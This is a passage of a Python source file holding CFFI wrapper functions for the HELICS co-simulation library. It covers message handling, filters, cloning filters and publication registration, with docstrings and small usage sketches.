f = loadSym("helicsEndpointSetInfo")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(info), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointSetOption(endpoint: HelicsEndpoint, option: HelicsHandleOption, value: int):
"""
Set a handle option on an endpoint.
**Parameters**
- **`endpoint`** - The endpoint to modify.
- **`option`** - Integer code for the option to set `helics.HelicsHandleOption`.
- **`value`** - The value to set the option to.
"""
f = loadSym("helicsEndpointSetOption")
err = helicsErrorInitialize()
f(endpoint.handle, HelicsHandleOption(option), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointGetOption(endpoint: HelicsEndpoint, option: HelicsHandleOption) -> int:
"""
Get the value of a handle option on an endpoint.
**Parameters**
- **`endpoint`** - The endpoint to query.
- **`option`** - Integer code for the option to query `helics.HelicsHandleOption`.
**Returns**: The value of the option; for boolean options this will be 0 or 1.
"""
f = loadSym("helicsEndpointGetOption")
result = f(endpoint.handle, HelicsHandleOption(option))
return result
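# Illustrative sketch (not part of the library): setting a handle option on an endpoint
# and reading it back. The specific enum member used here is an assumption; any
# `helics.HelicsHandleOption` value works the same way.
def _example_endpoint_option(endpoint: HelicsEndpoint) -> int:
    option = HelicsHandleOption.CONNECTION_OPTIONAL  # member name assumed
    helicsEndpointSetOption(endpoint, option, 1)
    return helicsEndpointGetOption(endpoint, option)  # 1 for boolean options that are set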
def helicsMessageGetSource(message: HelicsMessage) -> str:
"""
Message operation functions.
Functions for working with helics message envelopes.
Get the source endpoint of a message.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string with the source endpoint.
"""
f = loadSym("helicsMessageGetSource")
result = f(message.handle)
return ffi.string(result).decode()
def helicsMessageGetDestination(message: HelicsMessage) -> str:
"""
Get the destination endpoint of a message.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string with the destination endpoint.
"""
f = loadSym("helicsMessageGetDestination")
result = f(message.handle)
return ffi.string(result).decode()
def helicsMessageGetOriginalSource(message: HelicsMessage) -> str:
"""
Get the original source endpoint of a message, the source may have been modified by filters or other actions.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string with the source of a message.
"""
f = loadSym("helicsMessageGetOriginalSource")
result = f(message.handle)
return ffi.string(result).decode()
def helicsMessageGetOriginalDestination(message: HelicsMessage) -> str:
"""
Get the original destination endpoint of a message, the destination may have been modified by filters or other actions.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string with the original destination of a message.
"""
f = loadSym("helicsMessageGetOriginalDestination")
result = f(message.handle)
return ffi.string(result).decode()
def helicsMessageGetTime(message: HelicsMessage) -> HelicsTime:
"""
Get the helics time associated with a message.
**Parameters**
- **`message`** - The message object in question.
**Returns**: The time associated with a message.
"""
f = loadSym("helicsMessageGetTime")
result = f(message.handle)
return result
def helicsMessageGetString(message: HelicsMessage) -> str:
"""
Get the payload of a message as a string.
**Parameters**
- **`message`** - The message object in question.
**Returns**: A string representing the payload of a message.
"""
f = loadSym("helicsMessageGetString")
result = f(message.handle)
return ffi.string(result, helicsMessageGetByteCount(message)).decode()
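# Illustrative sketch (not part of the library): inspecting a received message. The
# message would normally come from a receive call defined elsewhere in this module;
# here it is simply passed in.
def _example_inspect_message(msg: HelicsMessage):
    print("from:", helicsMessageGetSource(msg))
    print("to:", helicsMessageGetDestination(msg))
    print("time:", helicsMessageGetTime(msg))
    print("payload:", helicsMessageGetString(msg))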
def helicsMessageGetMessageID(message: HelicsMessage) -> int:
"""
Get the messageID of a message.
**Parameters**
- **`message`** - The message object in question.
**Returns**: The messageID.
"""
f = loadSym("helicsMessageGetMessageID")
result = f(message.handle)
return result
def helicsMessageGetFlagOption(message: HelicsMessage, flag: int) -> bool:
"""
Get flag on a message.
**Parameters**
- **`message`** - The message object in question.
- **`flag`** - The flag to check; should be between [0,15].
**Returns**: `True` if the flag is set on the message.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsMessageCheckFlag")
else:
f = loadSym("helicsMessageGetFlagOption")
result = f(message.handle, flag)
return result == 1
def helicsMessageCheckFlag(message: HelicsMessage, flag: int) -> bool:
"""
Check if a flag is set on a message.
**Parameters**
- **`message`** - The message object in question.
- **`flag`** - The flag to check; should be between [0,15].
**Returns**: `True` if the flag is set on the message.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsMessageGetFlagOption` instead.")
return helicsMessageGetFlagOption(message, flag)
def helicsMessageGetByteCount(message: HelicsMessage) -> int:
"""
Get the size of the data payload in bytes.
**Parameters**
- **`message`** - The message object in question.
**Returns**: The size of the data payload.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsMessageGetRawDataSize")
else:
f = loadSym("helicsMessageGetByteCount")
result = f(message.handle)
return result
def helicsMessageGetRawDataSize(message: HelicsMessage) -> int:
"""
Get the size of the data payload in bytes.
**Parameters**
- **`message`** - The message object in question.
**Returns**: The size of the data payload.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsMessageGetByteCount` instead.")
return helicsMessageGetByteCount(message)
def helicsMessageGetRawData(message: HelicsMessage) -> bytes:
"""
Get the raw data for a message object.
**Parameters**
- **`message`** - A message object to get the data for.
**Returns**: Raw string data.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsMessageGetBytes` instead.")
return helicsMessageGetBytes(message)
def helicsMessageGetBytes(message: HelicsMessage) -> bytes:
"""
Get the raw data for a message object.
**Parameters**
- **`message`** - A message object to get the data for.
**Returns**: Raw string data.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsMessageGetRawData")
else:
f = loadSym("helicsMessageGetBytes")
err = helicsErrorInitialize()
maxMessageLen = helicsMessageGetByteCount(message) + 1024
data = ffi.new("char[{maxMessageLen}]".format(maxMessageLen=maxMessageLen))
actualSize = ffi.new("int[1]")
f(message.handle, data, maxMessageLen, actualSize, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
return ffi.unpack(data, length=actualSize[0])
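# Illustrative sketch (not part of the library): a byte-level round trip through a
# message payload. `helicsMessageSetData` is defined further down in this module.
def _example_bytes_roundtrip(msg: HelicsMessage) -> bytes:
    helicsMessageSetData(msg, b"\x00\x01\x02\x03")
    assert helicsMessageGetByteCount(msg) == 4
    return helicsMessageGetBytes(msg)  # b"\x00\x01\x02\x03"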
def helicsMessageGetRawDataPointer(message: HelicsMessage) -> pointer:
"""
Get a pointer to the raw data of a message.
**Parameters**
- **`message`** - A message object to get the data for.
**Returns**: A pointer to the raw data in memory, the pointer may be NULL if the message is not a valid message.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsMessageGetBytesPointer` instead.")
return helicsMessageGetBytesPointer(message)
def helicsMessageGetBytesPointer(message: HelicsMessage) -> pointer:
"""
Get a pointer to the raw data of a message.
**Parameters**
- **`message`** - A message object to get the data for.
**Returns**: A pointer to the raw data in memory, the pointer may be NULL if the message is not a valid message.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsMessageGetRawDataPointer")
else:
f = loadSym("helicsMessageGetBytesPointer")
result = f(message.handle)
return result
def helicsMessageIsValid(message: HelicsMessage) -> bool:
"""
A check if the message contains a valid payload.
**Parameters**
- **`message`** - The message object in question.
**Returns**: `True` if the message contains a payload.
"""
f = loadSym("helicsMessageIsValid")
result = f(message.handle)
return result == 1
def helicsMessageSetSource(message: HelicsMessage, source: str):
"""
Set the source of a message.
**Parameters**
- **`message`** - The message object in question.
- **`source`** - A string containing the source.
"""
f = loadSym("helicsMessageSetSource")
err = helicsErrorInitialize()
f(message.handle, cstring(source), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetDestination(message: HelicsMessage, destination: str):
"""
Set the destination of a message.
**Parameters**
- **`message`** - The message object in question.
- **`destination`** - A string containing the new destination.
"""
f = loadSym("helicsMessageSetDestination")
err = helicsErrorInitialize()
f(message.handle, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetOriginalSource(message: HelicsMessage, source: str):
"""
Set the original source of a message.
**Parameters**
- **`message`** - The message object in question.
- **`source`** - A string containing the new original source.
"""
f = loadSym("helicsMessageSetOriginalSource")
err = helicsErrorInitialize()
f(message.handle, cstring(source), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetOriginalDestination(message: HelicsMessage, destination: str):
"""
Set the original destination of a message.
**Parameters**
- **`message`** - The message object in question.
- **`destination`** - A string containing the new original destination.
"""
f = loadSym("helicsMessageSetOriginalDestination")
err = helicsErrorInitialize()
f(message.handle, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetTime(message: HelicsMessage, time: HelicsTime):
"""
Set the delivery time for a message.
**Parameters**
- **`message`** - The message object in question.
- **`time`** - The time the message should be delivered.
"""
f = loadSym("helicsMessageSetTime")
err = helicsErrorInitialize()
f(message.handle, time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageResize(message: HelicsMessage, new_size: int):
"""
Resize the data buffer for a message.
The message data buffer will be resized. There are no guarantees on what is in the buffer in newly allocated space.
If the allocated space is not sufficient, new allocations will occur.
**Parameters**
- **`message`** - The message object in question.
- **`new_size`** - The new size in bytes of the buffer.
"""
f = loadSym("helicsMessageResize")
err = helicsErrorInitialize()
f(message.handle, new_size, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageReserve(message: HelicsMessage, reserve_size: int):
"""
Reserve space in a buffer but don't actually resize.
The message data buffer will be reserved but not resized.
**Parameters**
- **`message`** - The message object in question.
- **`reserve_size`** - The number of bytes to reserve in the message object.
"""
f = loadSym("helicsMessageReserve")
err = helicsErrorInitialize()
f(message.handle, reserve_size, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetMessageID(message: HelicsMessage, message_id: int):
"""
Set the message ID for the message.
Normally this is not needed and the core of HELICS will adjust as needed.
**Parameters**
- **`message`** - The message object in question.
- **`message_id`** - A new message ID.
"""
f = loadSym("helicsMessageSetMessageID")
err = helicsErrorInitialize()
f(message.handle, message_id, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageClearFlags(message: HelicsMessage):
"""
Clear the flags of a message.
**Parameters**
- **`message`** - The message object in question.
"""
f = loadSym("helicsMessageClearFlags")
f(message.handle)
def helicsMessageSetFlagOption(message: HelicsMessage, flag: int, value: bool):
"""
Set a flag on a message.
**Parameters**
- **`message`** - The message object in question.
- **`flag`** - An index of a flag to set on the message.
- **`value`** - The desired value of the flag.
"""
f = loadSym("helicsMessageSetFlagOption")
err = helicsErrorInitialize()
f(message.handle, flag, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetString(message: HelicsMessage, string: str):
"""
Set the data payload of a message as a string.
**Parameters**
- **`message`** - The message object in question.
- **`string`** - A string containing the message data.
"""
f = loadSym("helicsMessageSetString")
err = helicsErrorInitialize()
f(message.handle, cstring(string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageSetData(message: HelicsMessage, data: bytes):
"""
Set the data payload of a message as raw data.
**Parameters**
- **`message`** - The message object in question.
- **`data`** - A string containing the message data.
"""
f = loadSym("helicsMessageSetData")
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f(message.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageAppendData(message: HelicsMessage, data: bytes):
"""
Append data to the payload.
**Parameters**
- **`message`** - The message object in question.
- **`data`** - A string containing the message data to append.
"""
f = loadSym("helicsMessageAppendData")
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f(message.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
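# Illustrative sketch (not part of the library): building a payload incrementally.
# `helicsMessageSetData` replaces the payload; `helicsMessageAppendData` extends it.
def _example_append_payload(msg: HelicsMessage) -> bytes:
    helicsMessageSetData(msg, b"header;")
    helicsMessageAppendData(msg, b"body")
    return helicsMessageGetBytes(msg)  # b"header;body"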
def helicsMessageCopy(source_message: HelicsMessage, destination_message: HelicsMessage):
"""
Copy a message object.
**Parameters**
- **`source_message`** - The message object to copy from.
- **`destination_message`** - The message object to copy to.
"""
f = loadSym("helicsMessageCopy")
err = helicsErrorInitialize()
f(source_message.handle, destination_message.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsMessageClone(message: HelicsMessage) -> HelicsMessage:
"""
Clone a message object.
**Parameters**
- **`message`** - The message object to copy from.
**Returns**: `helics.HelicsMessage`.
"""
f = loadSym("helicsMessageClone")
err = helicsErrorInitialize()
result = f(message.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsMessage(result)
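# Illustrative sketch (not part of the library): duplicating a message and releasing the
# copy when it is no longer needed. Freeing is optional because message memory is
# managed, but it lets the core reuse the storage sooner.
def _example_clone_and_free(msg: HelicsMessage):
    copy = helicsMessageClone(msg)
    print(helicsMessageGetString(copy))
    helicsMessageFree(copy)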
def helicsMessageFree(message: HelicsMessage):
"""
Free a message object from memory. Memory for message is managed so not using this function does not create memory leaks, this is an indication to the system that the memory for this message is done being used and can be reused for a new message.
`helics.helicsFederateClearMessages` can also be used to clear up all stored messages at once.
"""
f = loadSym("helicsMessageFree")
f(message.handle)
def helicsFederateRegisterFilter(fed: HelicsFederate, type: HelicsFilterType, name: str) -> HelicsFilter:
"""
Create a source Filter on the specified federate.
Filters can be created through a federate or a core; linking through a federate allows a few extra features of name matching to function on the federate interface, but the behavior is otherwise equivalent.
**Parameters**
- **`fed`** - The federate to register through.
- **`type`** - The type of filter to create `helics.HelicsFilterType`.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateRegisterFilter")
err = helicsErrorInitialize()
result = f(fed.handle, HelicsFilterType(type), cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
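# Illustrative sketch (not part of the library): registering a delay filter on a federate
# and attaching it to a source endpoint. The enum member name and the endpoint name are
# assumptions; "delay" is the property a delay filter understands.
def _example_delay_filter(fed: HelicsFederate) -> HelicsFilter:
    flt = helicsFederateRegisterFilter(fed, HelicsFilterType.DELAY, "delay_filter")  # member name assumed
    helicsFilterAddSourceTarget(flt, "sender/endpoint")  # hypothetical endpoint name
    helicsFilterSet(flt, "delay", 0.5)  # delay messages by 0.5 simulation time units
    return flt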
def helicsFederateRegisterGlobalFilter(fed: HelicsFederate, type: HelicsFilterType, name: str) -> HelicsFilter:
"""
Create a global source filter through a federate.
Filters can be created through a federate or a core; linking through a federate allows a few extra features of name matching to function on the federate interface, but the behavior is otherwise equivalent.
**Parameters**
- **`fed`** - The federate to register through.
- **`type`** - The type of filter to create `helics.HelicsFilterType`.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateRegisterGlobalFilter")
err = helicsErrorInitialize()
result = f(fed.handle, HelicsFilterType(type), cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsFederateRegisterCloningFilter(fed: HelicsFederate, name: str) -> HelicsCloningFilter:
"""
Create a cloning Filter on the specified federate.
Cloning filters copy a message and send it to multiple locations, source and destination can be added through other functions.
**Parameters**
- **`fed`** - The federate to register through.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsCloningFilter`.
"""
f = loadSym("helicsFederateRegisterCloningFilter")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCloningFilter(result)
def helicsFederateRegisterGlobalCloningFilter(fed: HelicsFederate, name: str) -> HelicsCloningFilter:
"""
Create a global cloning Filter on the specified federate.
Cloning filters copy a message and send it to multiple locations, source and destination can be added through other functions.
**Parameters**
- **`fed`** - The federate to register through.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateRegisterGlobalCloningFilter")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCloningFilter(result)
def helicsCoreRegisterFilter(core: HelicsCore, type: HelicsFilterType, name: str) -> HelicsFilter:
"""
Create a source Filter on the specified core.
Filters can be created through a federate or a core; linking through a federate allows a few extra features of name matching to function on the federate interface, but the behavior is otherwise equivalent.
**Parameters**
- **`core`** - The core to register through.
- **`type`** - The type of filter to create `helics.HelicsFilterType`.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsCoreRegisterFilter")
err = helicsErrorInitialize()
result = f(core.handle, HelicsFilterType(type), cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsCoreRegisterCloningFilter(core: HelicsCore, name: str) -> HelicsCloningFilter:
"""
Create a cloning Filter on the specified core.
Cloning filters copy a message and send it to multiple locations, source and destination can be added through other functions.
**Parameters**
- **`core`** - The core to register through.
- **`name`** - The name of the filter (can be NULL).
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsCoreRegisterCloningFilter")
err = helicsErrorInitialize()
result = f(core.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCloningFilter(result)
def helicsFederateGetFilterCount(fed: HelicsFederate) -> int:
"""
Get the number of filters registered through a federate.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to use to get the filter.
**Returns**: A count of the number of filters registered through a federate.
"""
f = loadSym("helicsFederateGetFilterCount")
result = f(fed.handle)
return result
def helicsFederateGetFilter(fed: HelicsFederate, name: str) -> HelicsFilter:
"""
Get a filter by its name, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to use to get the filter.
- **`name`** - The name of the filter.
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateGetFilter")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsFederateGetFilterByIndex(fed: HelicsFederate, index: int) -> HelicsFilter:
"""
Get a filter by its index, typically already created via registerInterfaces file or something of that nature.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to use to get the filter.
- **`index`** - The index of the filter to get.
**Returns**: `helics.HelicsFilter`.
"""
f = loadSym("helicsFederateGetFilterByIndex")
err = helicsErrorInitialize()
result = f(fed.handle, index, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFilter(result)
def helicsFilterIsValid(filter: HelicsFilter) -> bool:
"""
Check if a filter is valid.
**Parameters**
- **`filter`** - The filter object to check.
**Returns**: `True` if the Filter object represents a valid filter.
"""
f = loadSym("helicsFilterIsValid")
result = f(filter.handle)
return result == 1
def helicsFilterGetName(filter: HelicsFilter) -> str:
"""
Get the name of the filter and store in the given string.
**Parameters**
- **`filter`** - The given filter.
**Returns**: A string with the name of the filter.
"""
f = loadSym("helicsFilterGetName")
result = f(filter.handle)
return ffi.string(result).decode()
def helicsFilterSet(filter: HelicsFilter, property: str, value: float):
"""
Set a property on a filter.
**Parameters**
- **`filter`** - The filter to modify.
- **`property`** - A string containing the property to set.
- **`value`** - A numerical value for the property.
"""
f = loadSym("helicsFilterSet")
err = helicsErrorInitialize()
f(filter.handle, cstring(property), cdouble(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterSetString(filter: HelicsFilter, property: str, value: str):
"""
Set a string property on a filter.
**Parameters**
- **`filter`** - The filter to modify.
- **`property`** - A string containing the property to set.
- **`value`** - A string containing the new value.
"""
f = loadSym("helicsFilterSetString")
err = helicsErrorInitialize()
f(filter.handle, cstring(property), cstring(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterAddDestinationTarget(filter: HelicsFilter, destination: str):
"""
Add a destination target to a filter.
All messages going to a destination are copied to the delivery address(es).
**Parameters**
- **`filter`** - The given filter to add a destination target to.
- **`destination`** - The name of the endpoint to add as a destination target.
"""
f = loadSym("helicsFilterAddDestinationTarget")
err = helicsErrorInitialize()
f(filter.handle, cstring(destination), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterAddSourceTarget(filter: HelicsFilter, source_name: str):
"""
Add a source target to a filter.
All messages coming from a source are copied to the delivery address(es).
**Parameters**
- **`filter`** - The given filter.
- **`source_name`** - The name of the endpoint to add as a source target.
"""
f = loadSym("helicsFilterAddSourceTarget")
err = helicsErrorInitialize()
f(filter.handle, cstring(source_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterAddDeliveryEndpoint(filter: HelicsFilter, delivery_endpoint: str):
"""
Clone filter functions.
Functions that manipulate cloning filters in some way.
Add a delivery endpoint to a cloning filter.
All cloned messages are sent to the delivery address(es).
**Parameters**
- **`filter`** - The given filter.
- **`delivery_endpoint`** - The name of the endpoint to deliver messages to.
"""
f = loadSym("helicsFilterAddDeliveryEndpoint")
err = helicsErrorInitialize()
f(filter.handle, cstring(delivery_endpoint), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
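# Illustrative sketch (not part of the library): wiring up a cloning filter so every
# message sent from one endpoint is also delivered to an archive endpoint. The endpoint
# names are hypothetical.
def _example_cloning_filter(fed: HelicsFederate) -> HelicsCloningFilter:
    cloner = helicsFederateRegisterCloningFilter(fed, "archiver")
    helicsFilterAddSourceTarget(cloner, "sender/endpoint")
    helicsFilterAddDeliveryEndpoint(cloner, "archive/endpoint")
    return cloner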
def helicsFilterRemoveTarget(filter: HelicsFilter, target_name: str):
"""
Remove a destination target from a filter.
**Parameters**
- **`filter`** - The given filter.
- **`target_name`** - The named endpoint to remove as a target.
"""
f = loadSym("helicsFilterRemoveTarget")
err = helicsErrorInitialize()
f(filter.handle, cstring(target_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterRemoveDeliveryEndpoint(filter: HelicsFilter, delivery_endpoint: str):
"""
Remove a delivery destination from a cloning filter.
**Parameters**
- **`filter`** - The given filter (must be a cloning filter).
- **`delivery_endpoint`** - A string with the delivery endpoint to remove.
"""
f = loadSym("helicsFilterRemoveDeliveryEndpoint")
err = helicsErrorInitialize()
f(filter.handle, cstring(delivery_endpoint), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterGetInfo(filter: HelicsFilter) -> str:
"""
Get the data in the info field of a filter.
**Parameters**
- **`filter`** - The given filter.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsFilterGetInfo")
result = f(filter.handle)
return ffi.string(result).decode()
def helicsFilterSetInfo(filter: HelicsFilter, info: str):
"""
Set the data in the info field for a filter.
**Parameters**
- **`filter`** - The given filter.
- **`info`** - The string to set.
"""
f = loadSym("helicsFilterSetInfo")
err = helicsErrorInitialize()
f(filter.handle, cstring(info), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterSetOption(filter: HelicsFilter, option: HelicsHandleOption, value: int):
"""
Set a handle option on a filter.
**Parameters**
- **`filter`** - The given filter.
- **`option`** - The option to set `helics.HelicsHandleOption`.
- **`value`** - The value of the option commonly 0 for false 1 for true.
"""
f = loadSym("helicsFilterSetOption")
err = helicsErrorInitialize()
f(filter.handle, HelicsHandleOption(option), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterGetOption(filter: HelicsFilter, option: HelicsHandleOption) -> int:
"""
Get a handle option for the filter.
**Parameters**
- **`filter`** - The given filter to query.
- **`option`** - The option to query `helics.HelicsHandleOption`.
**Returns**: `int`.
"""
f = loadSym("helicsFilterGetOption")
result = f(filter.handle, HelicsHandleOption(option))
return result
def helicsFederateRegisterSubscription(fed: HelicsFederate, name: str, units: str = "") -> HelicsInput:
"""
Functions related to value federates for the C api.
Create a subscription.
The subscription becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a subscription, must have been created with `helics.helicsCreateValueFederate` or
`helics.helicsCreateCombinationFederate`.
- **`name`** - The identifier matching a publication to get a subscription for.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsSubscription`.
"""
f = loadSym("helicsFederateRegisterSubscription")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsInput(result)
def helicsFederateRegisterPublication(fed: HelicsFederate, name: str, type: HelicsDataType, units: str) -> HelicsPublication:
"""
Register a publication with a known type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication; the global publication name will be prepended with the federate name.
- **`type`** - A code identifying the type of the input see `helics.HelicsDataType` for available options.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterPublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), HelicsDataType(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
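# Illustrative sketch (not part of the library): registering a typed publication and a
# matching subscription. The interface names and units are hypothetical, and the
# `HelicsDataType` member name is an assumption.
def _example_register_value_interfaces(fed: HelicsFederate):
    pub = helicsFederateRegisterPublication(fed, "voltage", HelicsDataType.DOUBLE, "kV")  # member name assumed
    sub = helicsFederateRegisterSubscription(fed, "other_fed/voltage", "kV")
    return pub, sub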
def helicsFederateRegisterTypePublication(fed: HelicsFederate, name: str, type: str, units: str) -> HelicsPublication:
"""
Register a publication with a defined type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication.
- **`type`** - A string labeling the type of the publication.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterTypePublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateRegisterGlobalPublication(fed: HelicsFederate, name: str, type: HelicsDataType, units: str = "") -> HelicsPublication:
"""
Register a global named publication with an arbitrary type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication.
- **`type`** - A code identifying the type of the input see `helics.HelicsDataType` for available options.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterGlobalPublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), HelicsDataType(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
def helicsFederateRegisterGlobalTypePublication(fed: HelicsFederate, name: str, type: str, units: str) -> HelicsPublication:
"""
Register a global publication with a defined type.
The publication becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for subscriptions and publications.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` in which to create a publication.
- **`name`** - The identifier for the publication.
- **`type`** - A string describing the expected type of the publication.
- **`units`** - A string listing the units of the subscription (optional).
**Returns**: `helics.HelicsPublication`.
"""
f = loadSym("helicsFederateRegisterGlobalTypePublication")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), cstring(units), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsPublication(result)
